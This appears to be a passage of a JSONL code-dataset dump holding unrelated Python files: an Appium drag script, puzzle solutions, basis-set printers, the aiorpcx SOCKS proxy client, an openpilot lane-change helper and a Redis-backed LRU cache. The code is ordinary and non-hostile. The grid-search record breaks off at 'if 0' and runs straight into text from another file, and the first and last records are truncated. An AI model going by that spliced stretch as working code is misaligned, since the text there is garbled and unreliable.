driver.find_element_by_xpath(\"//*[contains(@text,'电池')]\")\n\n\n# driver.drag_and_drop(save_button, more_button)\n# driver.drag_and_drop(save_button, more_button)\n# driver.drag_and_drop(save_button, more_button)\ndriver.drag_and_drop(save_button, more_button)\n\n\n# user_button = driver.find_element_by_xpath(\"//*[contains(@text,'用户')]\")\n#\n# driver.drag_and_drop(user_button, save_button)\n\n# scroll 和 drag 的 区别 drag没有\"惯性\"\n# 相同点:都是使用元素进行传参\n# 和swipe项目, 一个传的是元素(drag),一个传的是坐标(swipe),\n# 当swipe的时间足够长的时候,和drag的效果相同\n\n# find_ele 如果找到了某个元素 会将具体位置缓存在系统中,\n# 只要不重新获取,就算已经跑出屏幕外,也会认为元素在之前缓存的位置\n\n# 只要某个元素在屏幕中出现了一部分,find_ele也会正常找到\n\n","sub_path":"就业班/第六阶段 移动自动化/移动自动化day3/02-代码/01-滑动和拖拽/drag.py","file_name":"drag.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"15058524","text":"import heapq\n\nN = int(input())\n\nboard = []\nfor _ in range(N):\n board.append(list(map(int, input().split())))\n\nstart = (0, 0)\nfor i in range(N):\n for j in range(N):\n if board[i][j] == 9:\n start = (i, j)\n\nmx = [-1, 0, 0, 1]\nmy = [0, -1, 1, 0]\n\ndef eat(board, start, size):\n N = len(board)\n s = (0, start[0], start[1])\n q = [s]\n visit = [[0]*N for _ in range(N)]\n visit[start[0]][start[1]] = 1\n board[start[0]][start[1]] = 0\n\n while q:\n t, x, y = heapq.heappop(q)\n \n if 0highest, then put the highest at the beginning\n ecp_list = sorted(eldata['elementECP'], key=lambda x: x['potentialAngularMomentum'])\n ecp_list.insert(0, ecp_list.pop())\n\n for pot in ecp_list:\n print_ecp_pot(pot)\n\n\ndef print_component_basis(basis, elements=None):\n print(\"Basis set: \" + basis['basisSetName'])\n print(\"Description: \" + basis['basisSetDescription'])\n eldata = basis['basisSetElements']\n\n # Filter to the given elements\n if elements is None:\n elements = list(eldata.keys())\n else:\n elements = [k for k in eldata.keys() if k in elements]\n\n # Electron Basis\n for z in elements:\n print_element(z, eldata[z])\n\n\ndef print_element_basis(basis, elements=None):\n print(\"Basis set: \" + basis['basisSetName'])\n print(\"Description: \" + basis['basisSetDescription'])\n\n eldata = basis['basisSetElements']\n\n if elements is None:\n elements = list(eldata.keys())\n else:\n elements = [k for k in eldata.keys() if k in elements]\n\n # strings\n complist = {z: ' '.join(eldata[z]['elementComponents']) for z in elements}\n reflist = {z: ' '.join(eldata[z]['elementReferences']) for z in elements if 'elementReferences' in eldata[z]}\n\n max_comp = max([len(x) for k, x in complist.items()])\n max_comp = max(max_comp, len(\"Components\"))\n\n # Header line\n print('{:4} {:{}} {:20}'.format(\"El\", \"Components\", max_comp + 1, \"References\"))\n print('-' * 80)\n for z in elements:\n data = basis['basisSetElements'][z]\n\n sym = lut.element_sym_from_Z(z)\n sym = lut.normalize_element_symbol(sym)\n\n print('{:4} {:{}} {:20}'.format(sym, complist[z], max_comp + 1, reflist[z] if z in reflist else 'None'))\n\n print()\n\n\ndef print_table_basis(basis, elements=None):\n print(\"Basis set: \" + basis['basisSetName'])\n print(\"Description: \" + basis['basisSetDescription'])\n print(\"Role: \" + basis['basisSetRole'])\n print()\n\n eldata = basis['basisSetElements']\n\n if elements is None:\n elements = list(eldata.keys())\n else:\n elements = [k for k in eldata.keys() if k in elements]\n\n # strings\n complist = {z: eldata[z]['elementEntry'] for z in elements}\n reflist = {z: eldata[z]['elementReferences'] for z in elements if 'elementReferences' in eldata[z]}\n\n max_comp = max([len(x) for k, x in complist.items()])\n max_comp = max(max_comp, len(\"Components\"))\n\n # Header line\n print('{:4} {:{}} {:20}'.format(\"El\", \"Entry\", max_comp + 1, \"References\"))\n print('-' * 80)\n for z in elements:\n data = basis['basisSetElements'][z]\n\n sym = lut.element_sym_from_Z(z)\n sym = lut.normalize_element_symbol(sym)\n\n print('{:4} {:{}} {:20}'.format(sym, complist[z], max_comp + 1, reflist[z] if z in reflist else 'None'))\n\n print()\n\n\ndef print_citation(citkey, cit):\n print(\"Citation: {}\".format(citkey))\n\n doistr = cit['DOI'] if 'DOI' in cit else 'MISSING'\n print(\" DOI: {}\".format(doistr))\n\n titlestr = cit['title'] if 'title' in cit else 'MISSING'\n print(\" Title: {}\".format(titlestr))\n\n if 'authors' in cit and len(cit['authors']) > 0:\n print(\" Authors: {}\".format(cit['authors'][0]))\n for a in cit['authors'][1:]:\n print(\" {}\".format(a))\n else:\n print(\" Authors: NONE\")\n\n journalstr = cit['journal'] if 'journal' in cit else \"MISSING\"\n volumestr = cit['volume'] if 'volume' in cit else \"MISSING\"\n pagestr = cit['page'] if 'page' in cit else \"MISSING\"\n yearstr = cit['year'] if 'year' in cit else \"MISSING\"\n\n print(\" {} v{} pp {} ({})\".format(journalstr, volumestr, pagestr, yearstr))\n","sub_path":"bse/curate/printing.py","file_name":"printing.py","file_ext":"py","file_size_in_byte":6327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"389853920","text":"# Copyright (c) 2018, Neil Booth\n#\n# All rights reserved.\n#\n# The MIT License (MIT)\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the\n# \"Software\"), to deal in the Software without restriction, including\n# without limitation the rights to use, copy, modify, merge, publish,\n# distribute, sublicense, and/or sell copies of the Software, and to\n# permit persons to whom the Software is furnished to do so, subject to\n# the following conditions:\n#\n# The above copyright notice and this permission notice shall be\n# included in all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\n# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\n# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND\n# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE\n# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION\n# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION\n# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\n'''SOCKS proxying.'''\n\nimport asyncio\nimport collections\nimport ipaddress\nimport socket\nimport struct\n\nfrom .util import Timeout\n\n\n__all__ = ('SOCKSUserAuth', 'SOCKS4', 'SOCKS4a', 'SOCKS5', 'SOCKSProxy',\n 'SOCKSError', 'SOCKSProtocolError', 'SOCKSFailure')\n\n\nSOCKSUserAuth = collections.namedtuple(\"SOCKSUserAuth\", \"username password\")\n\n\nclass SOCKSError(Exception):\n '''Base class for SOCKS exceptions. Each raised exception will be\n an instance of a derived class.'''\n\n\nclass SOCKSProtocolError(SOCKSError):\n '''Raised when the proxy does not follow the SOCKS protocol'''\n\n\nclass SOCKSFailure(SOCKSError):\n '''Raised when the proxy refuses or fails to make a connection'''\n\n\nclass SOCKSBase(object):\n\n @classmethod\n async def handshake(cls, socket, dst_host, dst_port, auth, loop):\n raise NotImplementedError\n\n @classmethod\n def name(cls):\n return cls.__name__\n\n @classmethod\n async def sock_recv(cls, loop, socket, n):\n result = b''\n while len(result) < n:\n data = await loop.sock_recv(socket, n - len(result))\n if not data:\n break\n result += data\n return result\n\n\nclass SOCKS4(SOCKSBase):\n '''SOCKS4 protocol wrapper.'''\n\n # See http://ftp.icm.edu.pl/packages/socks/socks4/SOCKS4.protocol\n REPLY_CODES = {\n 90: 'request granted',\n 91: 'request rejected or failed',\n 92: ('request rejected because SOCKS server cannot connect '\n 'to identd on the client'),\n 93: ('request rejected because the client program and identd '\n 'report different user-ids')\n }\n\n @classmethod\n async def _handshake(cls, socket, dst_host, dst_port, auth, loop):\n if isinstance(dst_host, ipaddress.IPv4Address):\n # SOCKS4\n dst_ip_packed = dst_host.packed\n host_bytes = b''\n else:\n # SOCKS4a\n dst_ip_packed = b'\\0\\0\\0\\1'\n host_bytes = dst_host.encode() + b'\\0'\n\n if isinstance(auth, SOCKSUserAuth):\n user_id = auth.username.encode()\n else:\n user_id = b''\n\n # Send TCP/IP stream CONNECT request\n data = b''.join([b'\\4\\1', struct.pack('>H', dst_port), dst_ip_packed,\n user_id, b'\\0', host_bytes])\n await loop.sock_sendall(socket, data)\n\n # Wait for 8-byte response\n data = await cls.sock_recv(loop, socket, 8)\n if len(data) != 8 or data[0] != 0:\n raise SOCKSProtocolError(f'invalid {cls.name()} proxy '\n f'response: {data}')\n reply_code = data[1]\n if reply_code != 90:\n msg = cls.REPLY_CODES.get(\n reply_code, f'unknown {cls.name()} reply code {reply_code}')\n raise SOCKSFailure(f'{cls.name()} proxy request failed: {msg}')\n # Remaining fields ignored\n\n @classmethod\n async def handshake(cls, socket, dst_host, dst_port, auth, loop):\n if not isinstance(dst_host, ipaddress.IPv4Address):\n try:\n dst_host = ipaddress.IPv4Address(dst_host)\n except ValueError:\n raise SOCKSProtocolError(\n f'SOCKS4 requires an IPv4 address: {dst_host}') from None\n await cls._handshake(socket, dst_host, dst_port, auth, loop)\n\n\nclass SOCKS4a(SOCKS4):\n\n @classmethod\n async def handshake(cls, socket, dst_host, dst_port, auth, loop):\n if not isinstance(dst_host, (str, ipaddress.IPv4Address)):\n raise SOCKSProtocolError(\n f'SOCKS4a requires an IPv4 address or host name: {dst_host}')\n await cls._handshake(socket, dst_host, dst_port, auth, loop)\n\n\nclass SOCKS5(SOCKSBase):\n '''SOCKS protocol wrapper.'''\n\n # See https://tools.ietf.org/html/rfc1928\n ERROR_CODES = {\n 1: 'general SOCKS server failure',\n 2: 'connection not allowed by ruleset',\n 3: 'network unreachable',\n 4: 'host unreachable',\n 5: 'connection refused',\n 6: 'TTL expired',\n 7: 'command not supported',\n 8: 'address type not supported',\n }\n\n @classmethod\n async def handshake(cls, socket, dst_host, dst_port, auth, loop):\n if not isinstance(dst_host, (str, ipaddress.IPv4Address,\n ipaddress.IPv6Address)):\n raise SOCKSProtocolError(f'SOCKS5 requires an IPv4 address, IPv6 '\n f'address, or host name: {dst_host}')\n\n # Initial handshake\n if isinstance(auth, SOCKSUserAuth):\n user_bytes = auth.username.encode()\n pwd_bytes = auth.password.encode()\n methods = [0, 2]\n else:\n methods = [0]\n\n greeting = b'\\5' + bytes([len(methods)]) + bytes(m for m in methods)\n await loop.sock_sendall(socket, greeting)\n\n # Get response\n data = await cls.sock_recv(loop, socket, 2)\n if len(data) != 2 or data[0] != 5:\n raise SOCKSProtocolError(f'invalid SOCKS5 proxy response: {data}')\n if data[1] not in methods:\n raise SOCKSFailure('SOCKS5 proxy rejected authentication methods')\n\n # Authenticate if user-password authentication\n if data[1] == 2:\n if not 0 < len(user_bytes) < 256:\n raise SOCKSFailure(f'invalid username length: {auth.username}')\n if not 0 < len(pwd_bytes) < 256:\n raise SOCKSFailure(f'invalid password length: {auth.password}')\n auth_msg = b''.join([bytes([1, len(user_bytes)]), user_bytes,\n bytes([len(pwd_bytes)]), pwd_bytes])\n await loop.sock_sendall(socket, auth_msg)\n data = await cls.sock_recv(loop, socket, 2)\n if data[0] != 1 or len(data) != 2:\n raise SOCKSProtocolError(f'invalid SOCKS5 proxy auth '\n f'response: {data}')\n if data[1] != 0:\n raise SOCKSFailure(f'SOCKS5 proxy auth failure code: '\n f'{data[1]}')\n\n # Send connection request\n if isinstance(dst_host, ipaddress.IPv4Address):\n addr = b'\\1' + dst_host.packed\n elif isinstance(dst_host, ipaddress.IPv6Address):\n addr = b'\\4' + dst_host.packed\n else:\n host = dst_host.encode()\n if len(host) > 255:\n raise SOCKSFailure(f'hostname too long: {len(host)} bytes')\n addr = b'\\3' + bytes([len(host)]) + host\n data = b''.join([b'\\5\\1\\0', addr, struct.pack('>H', dst_port)])\n await loop.sock_sendall(socket, data)\n\n # Get response\n data = await cls.sock_recv(loop, socket, 5)\n if (len(data) != 5 or data[0] != 5 or data[2] != 0 or\n data[3] not in (1, 3, 4)):\n raise SOCKSProtocolError(f'invalid SOCKS5 proxy response: {data}')\n if data[1] != 0:\n raise SOCKSFailure(cls.ERROR_CODES.get(\n data[1], f'unknown SOCKS5 error code: {data[1]}'))\n if data[3] == 1:\n addr_len, data = 3, data[4:] # IPv4\n elif data[3] == 3:\n addr_len, data = data[4], b'' # Hostname\n else:\n addr_len, data = 15, data[4:] # IPv6\n remaining_len = addr_len + 2\n rest = await cls.sock_recv(loop, socket, remaining_len)\n if len(rest) != remaining_len:\n raise SOCKSProtocolError(f'short SOCKS5 proxy reply: {rest}')\n\n\nclass SOCKSProxy(object):\n\n def __init__(self, address, protocol, auth):\n '''A SOCKS proxy at an address following a SOCKS protocol. auth is an\n authentication method to use when connecting, or None.\n\n address is a (host, port) pair; for IPv6 it can instead be a\n (host, port, flowinfo, scopeid) 4-tuple.\n '''\n self.address = address\n self.protocol = protocol\n self.auth = auth\n # Set on each successful connection via the proxy to the\n # result of socket.getpeername()\n self.peername = None\n\n def __str__(self):\n auth = 'username' if self.auth else 'none'\n return f'{self.protocol.name()} proxy at {self.address}, auth: {auth}'\n\n async def _connect_one(self, host, port, loop, timeout):\n '''Connect to the proxy and perform a handshake requesting a\n connection to (host, port).\n\n Return the open socket on success, or the exception on failure.\n '''\n sock = socket.socket()\n try:\n sock.setblocking(False)\n with Timeout(timeout, loop) as t:\n await t.run(loop.sock_connect(sock, self.address))\n await t.run(self.protocol.handshake(sock, host, port,\n self.auth, loop))\n self.peername = sock.getpeername()\n return sock\n except Exception as e:\n sock.close()\n return e\n\n async def _connect(self, addresses, loop, timeout):\n '''Connect to the proxy and perform a handshake requesting a\n connection to each address in addresses.\n\n Return an (open_socket, address) pair on success.\n '''\n assert len(addresses) > 0\n\n exceptions = []\n for address in addresses:\n host, port = address[:2]\n sock = await self._connect_one(host, port, loop, timeout)\n if isinstance(sock, socket.socket):\n return sock, address\n exceptions.append(sock)\n\n strings = set(str(exc) for exc in exceptions)\n raise (exceptions[0] if len(strings) == 1 else\n OSError(f'multiple exceptions: {\", \".join(strings)}'))\n\n async def _detect_proxy(self, loop, timeout):\n '''Return True if it appears we can connect to a SOCKS proxy,\n otherwise False.\n '''\n if self.protocol is SOCKS4a:\n host, port = 'www.google.com', 80\n else:\n host, port = ipaddress.IPv4Address('8.8.8.8'), 53\n\n sock = await self._connect_one(host, port, loop, timeout)\n if isinstance(sock, socket.socket):\n sock.close()\n return True\n\n # SOCKSFailure indicates something failed, but that we are\n # likely talking to a proxy\n return isinstance(sock, SOCKSFailure)\n\n @classmethod\n async def auto_detect_address(cls, address, auth, *, loop=None,\n timeout=5.0):\n '''Try to detect a SOCKS proxy at address using the authentication\n method (or None). SOCKS5, SOCKS4a and SOCKS are tried in\n order. If a SOCKS proxy is detected a SOCKSProxy object is\n returned.\n\n Returning a SOCKSProxy does not mean it is functioning - for\n example, it may have no network connectivity.\n\n If no proxy is detected return None.\n '''\n loop = loop or asyncio.get_event_loop()\n for protocol in (SOCKS5, SOCKS4a, SOCKS4):\n proxy = cls(address, protocol, auth)\n if await proxy._detect_proxy(loop, timeout):\n return proxy\n return None\n\n @classmethod\n async def auto_detect_host(cls, host, ports, auth, *, loop=None,\n timeout=5.0):\n '''Try to detect a SOCKS proxy on a host on one of the ports.\n\n Calls auto_detect for the ports in order. Returns SOCKS are\n tried in order; a SOCKSProxy object for the first detected\n proxy is returned.\n\n Returning a SOCKSProxy does not mean it is functioning - for\n example, it may have no network connectivity.\n\n If no proxy is detected return None.\n '''\n for port in ports:\n address = (host, port)\n proxy = await cls.auto_detect_address(address, auth,\n loop=loop, timeout=timeout)\n if proxy:\n return proxy\n\n return None\n\n async def create_connection(self, protocol_factory, host, port, *,\n resolve=False, timeout=30.0, loop=None,\n ssl=None, family=0, proto=0, flags=0):\n '''Set up a connection to (host, port) through the proxy.\n\n If resolve is True then host is resolved locally with\n getaddrinfo using family, proto and flags, otherwise the proxy\n is asked to resolve host.\n\n The function signature is similar to loop.create_connection()\n with the same result. The attribute _address is set on the\n protocol to the address of the successful remote connection.\n Additionally raises SOCKSError if something goes wrong with\n the proxy handshake.\n '''\n loop = loop or asyncio.get_event_loop()\n if resolve:\n infos = await loop.getaddrinfo(host, port, family=family,\n type=socket.SOCK_STREAM,\n proto=proto, flags=flags)\n addresses = [info[4] for info in infos]\n else:\n addresses = [(host, port)]\n\n sock, address = await self._connect(addresses, loop, timeout)\n\n def set_address():\n protocol = protocol_factory()\n protocol._address = address\n return protocol\n\n return await loop.create_connection(\n set_address, sock=sock, ssl=ssl,\n server_hostname=host if ssl else None)\n","sub_path":"aiorpcx/socks.py","file_name":"socks.py","file_ext":"py","file_size_in_byte":14605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"463513170","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.4 (62061)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-i686/egg/quintagroup/pingtool/utils.py\n# Compiled at: 2009-03-31 04:47:33\nfrom zope.schema.vocabulary import SimpleVocabulary\nfrom Products.CMFCore.utils import getToolByName\n\ndef getPingSites(context):\n pp = getToolByName(context, 'portal_pingtool', None)\n values = []\n if pp:\n values = tuple([ (i.Title(), i.id) for i in pp.objectValues() ])\n return SimpleVocabulary.fromItems(values)","sub_path":"pycfiles/quintagroup.pingtool-1.1.3-py2.4/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"69166624","text":"directory = 'C:/users/hai/my projects/google code jam/2013/round1b/A/'\r\n\r\n\r\n\r\ndef solve (f_in, f_out):\r\n T = int(f_in.readline())\r\n for testcase in range(1,T+1):\r\n #print (testcase)\r\n A,N = [int(x) for x in f_in.readline().split()]\r\n s = [int(x) for x in f_in.readline().split()]\r\n s.sort()\r\n sugg = [len(s)]\r\n if A == 1 and s[0] >=1:\r\n pass\r\n else:\r\n moves = 0\r\n while s:\r\n while A <= s[0]:\r\n moves += 1\r\n A = A*2-1\r\n A += s[0]\r\n s = s[1:]\r\n sugg.append(moves + len(s))\r\n result = min(sugg)\r\n f_out.write('Case #' + str(testcase) + ': '+ str(min(sugg)) + '\\n')\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef main_run():\r\n import os\r\n import time\r\n filenames = [x for x in os.listdir (directory)]\r\n filenames = [x for x in filenames if x.endswith('.in')]\r\n l1 = [(os.stat(directory+x).st_mtime, x) for x in filenames]\r\n chosen_filename = sorted(l1)[-1][1][:-3]\r\n\r\n print ('Directory : ', directory)\r\n print ('Chosen Filename : ',chosen_filename)\r\n print()\r\n print ('Start : ', time.ctime())\r\n print()\r\n \r\n f_in = open(directory+chosen_filename+'.in')\r\n f_out = open(directory+chosen_filename+'.out', 'w')\r\n solve(f_in,f_out)\r\n f_in.close()\r\n f_out.close()\r\n\r\n print ()\r\n print ('End : ', time.ctime())\r\n\r\n\r\nmain_run()\r\n","sub_path":"solutions_2692487_1/Python/bigOnion/A.py","file_name":"A.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"146774427","text":"from cereal import log\nfrom common.realtime import sec_since_boot, DT_MDL\nfrom selfdrive.config import Conversions as CV\n\nLaneChangeState = log.LateralPlan.LaneChangeState\nLaneChangeDirection = log.LateralPlan.LaneChangeDirection\n\nLANE_CHANGE_SPEED_MIN = 30 * CV.MPH_TO_MS\nLANE_CHANGE_TIME_MAX = 10.\nDP_TORQUE_APPLY_DURATION = 1.5\n\nDESIRES = {\n LaneChangeDirection.none: {\n LaneChangeState.off: log.LateralPlan.Desire.none,\n LaneChangeState.preLaneChange: log.LateralPlan.Desire.none,\n LaneChangeState.laneChangeStarting: log.LateralPlan.Desire.none,\n LaneChangeState.laneChangeFinishing: log.LateralPlan.Desire.none,\n },\n LaneChangeDirection.left: {\n LaneChangeState.off: log.LateralPlan.Desire.none,\n LaneChangeState.preLaneChange: log.LateralPlan.Desire.none,\n LaneChangeState.laneChangeStarting: log.LateralPlan.Desire.laneChangeLeft,\n LaneChangeState.laneChangeFinishing: log.LateralPlan.Desire.laneChangeLeft,\n },\n LaneChangeDirection.right: {\n LaneChangeState.off: log.LateralPlan.Desire.none,\n LaneChangeState.preLaneChange: log.LateralPlan.Desire.none,\n LaneChangeState.laneChangeStarting: log.LateralPlan.Desire.laneChangeRight,\n LaneChangeState.laneChangeFinishing: log.LateralPlan.Desire.laneChangeRight,\n },\n}\n\n\nclass DesireHelper:\n def __init__(self):\n self.lane_change_state = LaneChangeState.off\n self.lane_change_direction = LaneChangeDirection.none\n self.lane_change_timer = 0.0\n self.lane_change_ll_prob = 1.0\n self.keep_pulse_timer = 0.0\n self.prev_one_blinker = False\n self.desire = log.LateralPlan.Desire.none\n\n # dp\n # self.dp_torque_apply_length = 1.5 # secs of torque we apply for\n self.dp_lc_auto_start = 0. # time to start alc\n self.dp_lc_auto_start_in = 0. # remaining time to start alc\n self.dp_lc_auto_torque_end = 0. # time to end applying torque\n self.dp_torque_apply = False # should we apply torque?\n\n def update(self, carstate, active, lane_change_prob, dragon_conf):\n v_ego = carstate.vEgo\n one_blinker = carstate.leftBlinker != carstate.rightBlinker\n below_lane_change_speed = v_ego < (dragon_conf.dpLcMinMph * CV.MPH_TO_MS)\n\n if not active or self.lane_change_timer > LANE_CHANGE_TIME_MAX:\n self.lane_change_state = LaneChangeState.off\n self.lane_change_direction = LaneChangeDirection.none\n else:\n reset = False\n if one_blinker:\n cur_time = sec_since_boot()\n # reach auto lc condition\n if not below_lane_change_speed and dragon_conf.dpLateralMode == 2 and v_ego >= (dragon_conf.dpLcAutoMinMph * CV.MPH_TO_MS):\n # work out alc start time and torque apply end time\n if self.dp_lc_auto_start == 0.:\n self.dp_lc_auto_start = cur_time + dragon_conf.dpLcAutoDelay\n self.dp_lc_auto_torque_end = self.dp_lc_auto_start + DP_TORQUE_APPLY_DURATION\n else:\n # work out how long til alc start\n # for display only\n self.dp_lc_auto_start_in = self.dp_lc_auto_start - cur_time\n self.dp_torque_apply = True if self.dp_lc_auto_start < cur_time <= self.dp_lc_auto_torque_end else False\n else:\n reset = True\n\n # reset all vals\n if not active or reset:\n self.dp_lc_auto_start = 0.\n self.dp_lc_auto_start_in = 0.\n self.dp_lc_auto_torque_end = 0.\n self.dp_torque_apply = False\n\n # LaneChangeState.off\n if self.lane_change_state == LaneChangeState.off and one_blinker and not self.prev_one_blinker and not below_lane_change_speed:\n self.lane_change_state = LaneChangeState.preLaneChange\n self.lane_change_ll_prob = 1.0\n\n # LaneChangeState.preLaneChange\n elif self.lane_change_state == LaneChangeState.preLaneChange:\n # Set lane change direction\n self.lane_change_direction = LaneChangeDirection.left if \\\n carstate.leftBlinker else LaneChangeDirection.right\n\n torque_applied = carstate.steeringPressed and \\\n ((carstate.steeringTorque > 0 and self.lane_change_direction == LaneChangeDirection.left) or\n (carstate.steeringTorque < 0 and self.lane_change_direction == LaneChangeDirection.right))\n\n blindspot_detected = ((carstate.leftBlindspot and self.lane_change_direction == LaneChangeDirection.left) or\n (carstate.rightBlindspot and self.lane_change_direction == LaneChangeDirection.right))\n\n # if human made lane change prior alca, we should stop alca until new blinker (off -> on)\n self.dp_lc_auto_start = self.dp_lc_auto_torque_end if torque_applied else self.dp_lc_auto_start\n torque_applied = self.dp_torque_apply if self.dp_torque_apply else torque_applied\n if not one_blinker or below_lane_change_speed:\n self.lane_change_state = LaneChangeState.off\n elif torque_applied and not blindspot_detected:\n self.lane_change_state = LaneChangeState.laneChangeStarting\n\n # LaneChangeState.laneChangeStarting\n elif self.lane_change_state == LaneChangeState.laneChangeStarting:\n # fade out over .5s\n self.lane_change_ll_prob = max(self.lane_change_ll_prob - 2 * DT_MDL, 0.0)\n\n # 98% certainty\n if lane_change_prob < 0.02 and self.lane_change_ll_prob < 0.01:\n self.lane_change_state = LaneChangeState.laneChangeFinishing\n\n # LaneChangeState.laneChangeFinishing\n elif self.lane_change_state == LaneChangeState.laneChangeFinishing:\n # fade in laneline over 1s\n self.lane_change_ll_prob = min(self.lane_change_ll_prob + DT_MDL, 1.0)\n\n if self.lane_change_ll_prob > 0.99:\n self.lane_change_direction = LaneChangeDirection.none\n if one_blinker:\n self.lane_change_state = LaneChangeState.preLaneChange\n else:\n self.lane_change_state = LaneChangeState.off\n\n if self.lane_change_state in (LaneChangeState.off, LaneChangeState.preLaneChange):\n self.lane_change_timer = 0.0\n else:\n self.lane_change_timer += DT_MDL\n\n self.prev_one_blinker = one_blinker\n\n self.desire = DESIRES[self.lane_change_direction][self.lane_change_state]\n\n # Send keep pulse once per second during LaneChangeStart.preLaneChange\n if self.lane_change_state in (LaneChangeState.off, LaneChangeState.laneChangeStarting):\n self.keep_pulse_timer = 0.0\n elif self.lane_change_state == LaneChangeState.preLaneChange:\n self.keep_pulse_timer += DT_MDL\n if self.keep_pulse_timer > 1.0:\n self.keep_pulse_timer = 0.0\n elif self.desire in (log.LateralPlan.Desire.keepLeft, log.LateralPlan.Desire.keepRight):\n self.desire = log.LateralPlan.Desire.none\n","sub_path":"selfdrive/controls/lib/desire_helper.py","file_name":"desire_helper.py","file_ext":"py","file_size_in_byte":6688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"249354940","text":"import time\nfrom threading import RLock\nfrom Q3.RedisCache import RedisCache\nfrom collections import OrderedDict\n\n\nclass LRUCache(OrderedDict):\n def __init__(self, max_len=128, max_age_seconds=60, redis_host='localhost', redis_port=6379, redis_db=0, cache_name='lrucache'):\n super().__init__()\n assert max_age_seconds >= 0\n assert max_len >= 1\n\n self.max_len = max_len # the capacity\n self.max_age = max_age_seconds\n self.lock = RLock()\n self.redis_conn = RedisCache(cache_name, redis_host, redis_port, redis_db)\n self.get_items_from_cache() # get the former cache from database\n\n def __contains__(self, key):\n \"\"\" Return True if the dict has a key, else return False. \"\"\"\n try:\n with self.lock:\n item = OrderedDict.__getitem__(self, key)\n if time.time() - item[1] < self.max_age:\n return True\n else:\n del self[key]\n self.redis_conn.remove(key)\n except KeyError:\n pass\n return False\n\n def __getitem__(self, key):\n \"\"\" Return the item of the dict.\n Raises a KeyError if key is not in the map.\n \"\"\"\n with self.lock:\n cur_time = time.time()\n item = OrderedDict.__getitem__(self, key)\n item_age = cur_time - item[1]\n if item_age < self.max_age:\n return item[0]\n else:\n del self[key]\n self.redis_conn.remove(key)\n raise KeyError(key)\n\n def __setitem__(self, key, value, cur_time=time.time()):\n \"\"\" Set d[key] to value. \"\"\"\n with self.lock:\n if key not in self:\n if len(self) == self.max_len:\n try:\n first = next(iter(self))\n if first in self:\n self.pop(first)\n finally:\n self.redis_conn.remove(first)\n else:\n if len(self) == self.max_len:\n OrderedDict.pop(self, key)\n self.redis_conn.remove(key)\n OrderedDict.__setitem__(self, key, (value, cur_time))\n self.redis_conn.set(key, value, cur_time)\n\n def set_capacity(self, n: int) -> None:\n \"\"\" reset the capacity of the LRU\"\"\"\n self.max_len = n\n while len(self) > self.max_len:\n deleted = self.popitem(last=False)\n del self[deleted]\n self.redis_conn.remove(deleted)\n\n def get_items_from_cache(self):\n \"\"\"get the former cache from database\"\"\"\n OrderedDict.clear(self)\n for key, value in self.redis_conn.get_all_keys().items():\n if not key.endswith('_time?'):\n self.__setitem__(key, value, float(self.redis_conn.get(key + '_time?')))\n\n def set_redis_conn(self, redis, cache_name):\n \"\"\"reset the redis connection\"\"\"\n self.redis_conn = RedisCache(cache_name=cache_name)\n self.redis_conn.set_redis_conn(redis)\n self.get_items_from_cache()\n\n def get(self, key, default=None):\n try:\n cur_time = time.time()\n value = self.__getitem__(key)\n del self[key]\n OrderedDict.__setitem__(self, key, (value, cur_time))\n self.redis_conn.set(key, value, cur_time)\n return value\n except KeyError:\n return default\n\n def put(self, key, value):\n self.__setitem__(key, value)\n\n def clear(self):\n OrderedDict.clear(self)\n self.redis_conn.clear()","sub_path":"Q3/LRUCache.py","file_name":"LRUCache.py","file_ext":"py","file_size_in_byte":3645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"256916554","text":"# -:- encoding: UTF-8 -:-\nimport locale\n\ndef sort_features(features, group_property='type', sort_properties=('name',), groups=None):\n \"\"\"\n Sort list of features (with properties) by a single group property and multiple sort properties.\n Features are sorted by the group first, then the additional properties. Sorts features\n alphanumerical, except for group properties which are sorted by the order of the groups list.\n\n Sorts features in-place.\n\n :param groups: List of group values. Defines the sort order of the group property.\n\n >>> fc = [\n ... {'properties': {'type': 'a', 'name': 'aaa'}},\n ... {'properties': {'type': 'b', 'name': 'aaa'}},\n ... {'properties': {'type': 'c', 'name': 'bbb'}},\n ... {'properties': {'type': 'c', 'name': 'aaa'}},\n ... ]\n >>> sort_features(fc, groups=['c', 'a', 'b'])\n >>> fc # doctest: +NORMALIZE_WHITESPACE\n [{'properties': {'type': 'c', 'name': 'aaa'}},\n {'properties': {'type': 'c', 'name': 'bbb'}},\n {'properties': {'type': 'a', 'name': 'aaa'}},\n {'properties': {'type': 'b', 'name': 'aaa'}}]\n \"\"\"\n group_index = None\n if groups:\n group_index = {g: i for (i, g) in enumerate(groups)}\n\n def key(feature):\n k = []\n group = feature['properties'].get(group_property)\n if group_index:\n k.append(group_index.get(group, 1e99))\n else:\n k.append(group)\n\n locale_encoding = locale.getlocale(locale.LC_COLLATE)[1] or 'UTF-8'\n for p in sort_properties:\n v = 